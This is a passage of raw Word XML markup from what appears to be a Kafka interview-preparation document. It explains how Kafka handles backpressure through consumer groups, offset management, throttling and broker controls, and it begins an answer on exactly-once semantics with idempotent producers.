          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka supports </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where multiple consumers can read from the same topic in parallel. This helps distribute the load and reduce the chance of individual consumers falling behind. If one consumer is lagging, others in the same consumer group can handle the load, thus mitigating backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4834C658" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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anual Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows consumers to manage offsets manually, providing more control over consumption. Consumers can decide when to commit offsets, allowing them to delay committing until they have processed the message completely. This is useful when processing takes time, preventing premature commits and helping manage backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA0380" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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ncreasing Polling Rate</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can configure how often they poll messages using settings like fetch.min.bytes, fetch.max.bytes, and max.poll.records. By increasing the number of records consumed in a single poll, consumers can reduce lag. However, this can lead to higher memory consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454FDB2" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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3. Broker-side Controls and Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B957858" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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ackpressure on Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers can also experience backpressure, especially when disk I/O is slow or when the broker is under heavy load. The broker has mechanisms to handle this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036AA46" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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og Segments and Disk Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers manage message logs efficiently to avoid disk overflow. If a broker’s disk usage is high, it might throttle incoming messages or stop accepting new messages to prevent running out of space. This behavior helps ensure that brokers do not get overwhelmed, creating backpressure on the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2F2541" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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artition Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka replicates data across multiple brokers for fault tolerance. If a broker is slow, another replica can take over, preventing the system from being fully impacted by a single broker failure. However, if the replication is delayed, this could add pressure to other parts of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5291F" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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og Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can compact logs to keep only the latest value for a key in the log. This reduces the size of logs and helps avoid disk overflow, indirectly managing backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF76380" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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4. Consumer and Producer Throttling Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB10C27" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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allows for throttling to manage backpressure both on the producer and consumer side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C0829" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roducer Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer can be configured to use a limited number of retries and control the rate of message production using linger.ms and batch.size. If the broker is under heavy load, throttling the rate at which messages are produced prevents the producer from overwhelming the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741FE7C" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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Throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers can be throttled by adjusting how much data they fetch per request (max.poll.records, fetch.max.bytes). If consumers are overwhelmed with too many messages, these parameters can be adjusted to control the rate at which data is consumed and processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CCC2F8" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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5. Kafka's Consumer Group Model and Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60A1D2" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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s </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an essential tool for managing backpressure in a distributed manner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692CED8C" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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ultiple Consumers per Group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple consumers in the same group can share the load of reading from different partitions. This scaling allows the system to handle higher message volumes without a single consumer falling behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA2023A" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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Group Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If one consumer falls behind, other consumers in the group can take over consuming the partitions assigned to it, which helps to distribute the load more evenly and reduce backpressure on any single consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C5A44" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FAB75" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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handles backpressure in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18418FA8" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roducer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630E5F1" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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ducers manage backpressure by buffering messages, applying retries, and adjusting batch sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF21416" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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ducers can be rate-limited to avoid overwhelming brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9590C" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9FF05" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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sumer lag (the difference between the consumer's offset and the latest available offset) is a key indicator of backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33193E9B" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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sumers can manage offsets manually and scale horizontally using consumer groups to handle increased load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A838757" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roker Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EBF5F0" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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brokers prevent overload by controlling disk usage and managing replication effectively. Throttling and log compaction help prevent backpressure from escalating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146D027" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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Group Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC4B72" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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lastRenderedPageBreak/>
        <w:t>Kafka’s consumer group model enables load balancing and helps reduce lag by distributing partitions across multiple consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7481A" w14:textId="77777777" w:rsidR="00944DF8" w:rsidRPr="0003272F" w:rsidRDefault="00944DF8" w:rsidP="00944DF8">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uses a combination of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rate limiting</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consumer lag monitoring</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consumer scaling</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broker-side optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle backpressure efficiently, ensuring system stability and performance even under heavy load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E89F2E" w14:textId="1E68907C"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37A766C">
          <v:rect id="_x0000_i3183" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F6A23" w14:textId="4C43265D" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="800" w:name="_Toc196308280"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka’s exactly-once semantics. How is it implemented, and why is it important</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="800"/>
    </w:p>
    <w:p w14:paraId="30776498" w14:textId="70328EE3" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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s Exactly-Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5AEADD" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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Exactly-Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka ensures that a message is neither lost nor processed more than once, providing a guarantee that each message is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered and processed exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in both the producer and consumer pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF123B6" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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is is crucial in use cases where data integrity is of utmost importance, such as financial transactions, event sourcing, and order processing. Without EOS, there could be issues like duplicate processing, missing messages, or inconsistent results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3C7AB" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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How is Exactly-Once Semantics (EOS) Implemented?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013FE110" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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provides </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producers</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transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These mechanisms work together to ensure that messages are reliably produced, delivered, and consumed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9D2B2" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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1. Idempotent Producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004ACC4" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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dempotency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that producing a message multiple times will not result in multiple entries in the Kafka log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E649FBA" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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producers can be </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> starting from </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka 0.11</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This feature ensures that if a message is sent multiple times (due to retries or network failures), it will be written to the topic only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35506D76" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer id</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sequence number</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each message it sends. If a message is retried, the broker checks the sequence number and skips writing the message if it’s already been written before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69842394" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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ey Concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D55CB32" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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roducer ID</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uniquely identifies the producer instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60FC41" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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equence Number</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
